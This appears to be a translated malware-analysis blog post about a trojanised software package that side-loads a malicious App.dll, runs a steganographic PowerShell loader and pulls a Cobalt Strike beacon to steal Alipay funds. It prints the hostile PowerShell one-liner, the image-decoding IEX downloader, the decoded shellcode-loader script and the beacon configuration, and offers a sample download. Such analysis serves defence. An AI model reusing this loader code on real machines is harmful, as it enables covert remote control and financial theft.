Software bundled with Cobalt Strike remote control Trojan

Category: Tag:

Today, I found a piece of software that uses white and black to launch a PowerShell script to load the Cobalt Strike remote control Trojan, which is used to control the victim’s machine to steal Alipay money.

One: Trojan horse behavior analysis
After downloading the software, it was found that MSI was used to package, and use lessmsi to unpack (you can also install the file normally)

After decompression, the files are sorted in order of modification time, and it is easy to find that the last modified file is suspicious

Through experience (you can also get it under debugging), it can be seen that App.dll (MD5: 17BD779769DBEC0B58966D066F656A72) adds the VMP 2.x shell, which is the most suspicious. Appdll.dll is actually a normal app.dll file. Obviously, the main program of iQiyi will actively load the App.dll file. The Trojan can replace the normal DLL to do white and black, so just look at the code of App.dll. For the old version of vmp 2.x, use zeus vmp to unpack it easily (of course you can run it directly with F9). The string has only one line of code: cmd.exe /c powershell -exec bypass -f .\dataup .ps1 is to start dataup.ps1 (F409AE142DE9167CE4CD2B691F8A2A50) in the root directory, which is a PowerShell script.

The focus is on dataup.ps1. Let’s take a look at the PowerShell script content:

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(""));$o=a Byte[] 5220;(0..2)|%{foreach($x in(0..1739)){$p=$g.GetPixel($x,$_);$o[$_*1740+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3546]))

This script uses steganography to write the code into the png image, and decrypt the content according to the script:

Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
        Param ($var_module, $var_procedure)               
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
        return $var_type_builder.CreateType()
[Byte[]]$var_code = [System.Convert]::FromBase64String
for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer
((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
If ([IntPtr]::size -eq 8) {
        start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
else {
        IEX $DoIt

According to experience (you will know it if you have more debugging), it is very similar to the PowerShell server script of Cobalt Strike. From the above Base64 conversion and XOR with 35 (decimal), ShellCode is obtained. The size is 4KB. Not surprisingly, it is Cobalt Strike. , Then we continue to debug this ShellCode.

Debugging tips: The simpler way is to copy the binary code of ShellCode directly, find a shellless program and load it with OD, and then paste and cover the binary code from the entry point to debug normally (after overwriting, save the file and re Load OD, so you can directly analyze the code with Ctrl+A)

According to past experience, I saw ShellCode’s API call method, and it was confirmed that it was Cobalt Strike again. The debugging process was skipped (you can learn single-step tracking and try it yourself), and the process is that ShellCode goes to to request the Beacon core DLL to proceed. Memory decryption loading

The Beacon core code obtained through the network is first self-decrypted out of PE, and then executed in memory.

Tips: After decrypting the PE, you can directly dump the data segment, and then use ExeinfoPE to extract the DLL

The decrypted DLL is checked by LordPE and the export module name is indeed beacon.dll, and once again it is confirmed that it is Cobalt Strike

With Cobalt Strike’s beacon.dll, let’s take a look at its Trojan horse configuration information. A simple way to directly decrypt Cobalt Strike configuration information online is to upload the bin file to get it. The decryption URL: http://pokemon .work:8501

File 4a8abb8f54fd4283af2fde919f923625bc3d6b998b215467ddc125d1b5d2823d receved !

BeaconType – HTTP
Port – 4455
SleepTime – 60000
MaxGetSize – 1048576
Jitter – 0
MaxDNS – 255
PublicKey – b’0\x81\x9f0\r\x06\t\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xa7\t\x91\xd6\x9d\x81j`\x1f\xfa\x80\x97ds\x83\x0f\r;A\’m\’\x90@\x1d\xde\xdb\x18\xe2\xd3\xca\xb3\xc3\x15\xe3″#%\xbeB\xb6Z\xdb(x\xf3?Z\x03\xffP\x10\xb2>\x84Q\x0c\x14\x82\xadjB\xf1\xe7\xe5rn\xb3\x18\x13\xe7Cv@\xedxy\x95_@\x1e\x17,4\xd3QrAYm\xd4\x1f\x8eH\xd3\xd1\xb1\xc2\x88\xe6\xc8u/\xf6]\xc2z\xcc\xcb\xa4\xba\x9c\xd6\xd0\xe4\xdea\x96\xce\xa4\xdaH\r;\x99\xd0\xed\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00′
C2Server –,/activity
UserAgent – Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
HttpPostUri – /submit.php
HttpGet_Metadata – Cookie
HttpPost_Metadata – Content-Type: application/octet-stream
SpawnTo – b’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00′
PipeName –
DNS_Idle –
DNS_Sleep – 0
SSH_Host – Not Found
SSH_Port – Not Found
SSH_Username – Not Found
SSH_Password_Plaintext – Not Found
SSH_Password_Pubkey – Not Found
HttpGet_Verb – GET
HttpPost_Verb – POST
HttpPostChunk – 0
Spawnto_x86 – %windir%\syswow64\rundll32.exe
Spawnto_x64 – %windir%\sysnative\rundll32.exe
CryptoScheme – 0
Proxy_Config – Not Found
Proxy_User – Not Found
Proxy_Password – Not Found
Proxy_Behavior – Use IE settings
Watermark – 305419896
bStageCleanup – False
bCFGCaution – False
KillDate – 0
bProcInject_StartRWX – True
bProcInject_UseRWX – True
bProcInject_MinAllocSize – 0
ProcInject_PrependAppend_x86 – Empty
ProcInject_PrependAppend_x64 – Empty
ProcInject_Execute – CreateThread
ProcInject_AllocationMethod – VirtualAllocEx
bUsesCookies – True
HostHeader –

C2’s server address:  (


Of course, interested students can manually debug the DLL to obtain configuration information and related functions. I have debugged it many times and will not repeat them. There are also many articles about the Cobalt Strike Trojan. You can search for it and learn from this article. The opportunity to analyze and explain one of Cobalt Strike’s ShellCode loading methods, I hope it can help everyone.

Trojan download address(download it) and related file MD5 (decompression password: 52pojie):

App.dll MD5: 17BD779769DBEC0B58966D066F656A72
dataup.ps1 MD5: F409AE142DE9167CE4CD2B691F8A2A50
shellcode MD5: DDFE4FA2341F59292BFBA48E30988831
Beacon.dll MD5: 50B9A5F1257F5F392D5415FED80904D7



There are no reviews yet.

Be the first to review “Software bundled with Cobalt Strike remote control Trojan”

Your email address will not be published. Required fields are marked *